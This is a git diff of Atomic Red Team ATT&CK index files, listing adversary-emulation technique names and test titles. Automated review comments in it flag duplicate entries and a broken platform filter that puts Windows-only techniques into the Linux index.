- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
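Review bot: T1098.007 Additional Local or Domain Groups is added here and again in the earlier @@ -948 hunk, in both cases immediately before the T1546.011 Application Shimming entry; neither hunk shows its tactic heading, so please confirm the two insertions fall under different sections (the technique is valid for both persistence and privilege-escalation) rather than being a duplicate within one section. The same check applies to T1546.017 Udev Rules (@@ -1223 and @@ -1756) and T1557.004 Evil Twin (@@ -1978 and @@ -2167).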
@@ -1756,6 +1766,7 @@
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1792,6 +1803,7 @@
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071 Application Layer Protocol](../../T1071/T1071.md)
@@ -1846,7 +1858,7 @@
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1978,6 +1990,7 @@
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
+- T1557.004 Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
@@ -2002,12 +2015,14 @@
- [T1114.002 Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md)
- Atomic Test #1: Office365 - Remote Mail Collected [office-365]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.004 Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1213.005 Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- [T1021.005 Remote Services:VNC](../../T1021.005/T1021.005.md)
@@ -2150,6 +2165,7 @@
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- Atomic Test #2: Install Additional Authentication Packages [windows]
+- T1558.005 Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
@@ -2167,6 +2183,7 @@
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
- Atomic Test #2: Search for Passwords in Powershell History [windows]
+- T1557.004 Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
@@ -2774,6 +2791,8 @@
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1485.001 Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.003 SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2790,10 +2809,13 @@
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
+- T1496.004 Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 6c82b248b1..8ce604e24b 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -1,28 +1,14 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- - Atomic Test #1: Malicious PAM rule [linux]
- - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- - Atomic Test #3: Malicious PAM module [linux]
- T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- - Atomic Test #10: chflags - Remove immutable file attribute [linux]
- - Atomic Test #11: Chmod through c script [macos, linux]
- - Atomic Test #12: Chmod through c script (freebsd) [linux]
- - Atomic Test #13: Chown through c script [macos, linux]
- - Atomic Test #14: Chown through c script (freebsd) [linux]
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
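Review bot: This hunk deletes existing Linux tests from the Linux index and replaces them with Windows-only techniques, which points to a broken platform filter in the index generator rather than an intended content change: the three T1556.003 PAM tests and all fourteen T1222.002 chmod/chown/chattr/chflags tests are removed, while T1055.011 Extra Window Memory Injection, T1218.011 Rundll32, T1216.001 Pubprn and T1006 Direct Volume Access are added as CONTRIBUTE A TEST entries even though none of them can run on Linux. Unless those atomic tests were deleted elsewhere in this PR, the hunk shrinking from 28 to 14 lines is a regression; fix the platform selection and regenerate before merging.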
@@ -30,33 +16,29 @@
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- - Atomic Test #1: Sudo usage [macos, linux]
- - Atomic Test #2: Sudo usage (freebsd) [linux]
- - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
-- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- - Atomic Test #1: rm -rf [macos, linux]
- - Atomic Test #2: rm -rf [linux]
- - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
- - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
- - Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
- - Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
- - Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux]
- - Atomic Test #19: Overwrite Linux Mail Spool [linux]
- - Atomic Test #20: Overwrite Linux Log [linux]
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1036.009 Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
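Review bot: Same platform-filter problem in this hunk: the six T1548.003 sudo tests and the nine T1070.002 log-clearing tests are dropped, T1036.009 Break Process Trees (a Linux/macOS technique) is replaced by T1574.001 DLL Search Order Hijacking, and the new entries (T1548.002 Bypass User Account Control, T1574.011 Services Registry Permissions Weakness, T1218.013 Mavinject, T1218.004 InstallUtil, T1218.007 Msiexec, T1556.002 Password Filter DLL, T1222.001 Windows File and Directory Permissions Modification) are all Windows-only. Treat this as further evidence of the generator bug, not as a reviewable index change.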
@@ -69,6 +51,7 @@
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #10: Clear Docker Container Logs [linux]
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -81,6 +64,7 @@
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #2: Disable journal logging via systemctl utility [linux]
- Atomic Test #3: Disable journal logging via sed utility [linux]
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #2: Copy and Delete Mailbox Data on Linux [linux]
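Review bot: T1055.003 Thread Execution Hijacking is a Windows-only process-injection sub-technique (its existing test, visible in the index.md hunk at @@ -948, is tagged [windows]), so it should not appear in linux-index.md; this line is another symptom of the broken platform filter.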
@@ -94,9 +78,14 @@
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
- Atomic Test #1: Delay execution with ping [linux, macos]
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start Packet Filter [linux]
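Review bot: Of the added lines here, T1550 Use Alternate Authentication Material is cross-platform and acceptable, but T1218.003 CMSTP, T1562.002 Disable Windows Event Logging and T1218.002 Control Panel are Windows-only and should not be in the Linux index.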
@@ -111,30 +100,25 @@
- Atomic Test #17: Tail the UFW firewall log file [linux]
- Atomic Test #18: Disable iptables [linux]
- Atomic Test #19: Modify/delete iptables firewall rules [linux]
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1562.012 Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md)
- - Atomic Test #1: Delete all auditd rules using auditctl [linux]
- - Atomic Test #2: Disable auditd using auditctl [linux]
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- - Atomic Test #1: Make and modify binary from C source [macos, linux]
- - Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- - Atomic Test #3: Set a SetUID flag on file [macos, linux]
- - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- - Atomic Test #5: Set a SetGID flag on file [macos, linux]
- - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- - Atomic Test #7: Make and modify capabilities of a binary [linux]
- - Atomic Test #8: Provide the SetUID capability to a file [linux]
- - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
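Review bot: This hunk removes the two T1562.012 auditd tests, both T1574.006 LD_PRELOAD tests and all ten T1548.001 setuid/setgid tests, which are among the most Linux-specific atomics in the repository, and adds T1112 Modify Registry, T1070.001 Clear Windows Event Logs, T1207 Rogue Domain Controller, T1218.008 Odbcconf, T1055.013 Process Doppelgänging and T1134.002 Create Process with Token, none of which apply to Linux. This should block the merge until the generator is fixed and the file regenerated.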
@@ -143,16 +127,25 @@
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
- Atomic Test #4: Hiding a malicious process with bind mounts [linux]
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
- Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI [linux]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Disable history collection (freebsd) [linux]
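Review bot: the nine new entries are inserted at scattered positions (T1550.003 after T1070, T1055.004 and T1553.005 after T1036.004, T1218.012 after T1055.002, T1134.001 after T1480, and so on) rather than grouped or sorted by technique ID, so list order is whatever the generator's map iteration happens to yield and every regeneration will churn the file like this. Sorting entries by technique ID within each tactic would make future diffs reviewable. The platform concern from the previous hunk applies here too: Pass the Ticket, APC injection, Mark-of-the-Web bypass, PE injection, Verclsid, Mshta, token theft, LNK icon smuggling and Make and Impersonate Token are all Windows-only in ATT&CK and should not be solicited in a `[linux]` index.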
@@ -164,8 +157,13 @@
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable syslog (freebsd) [linux]
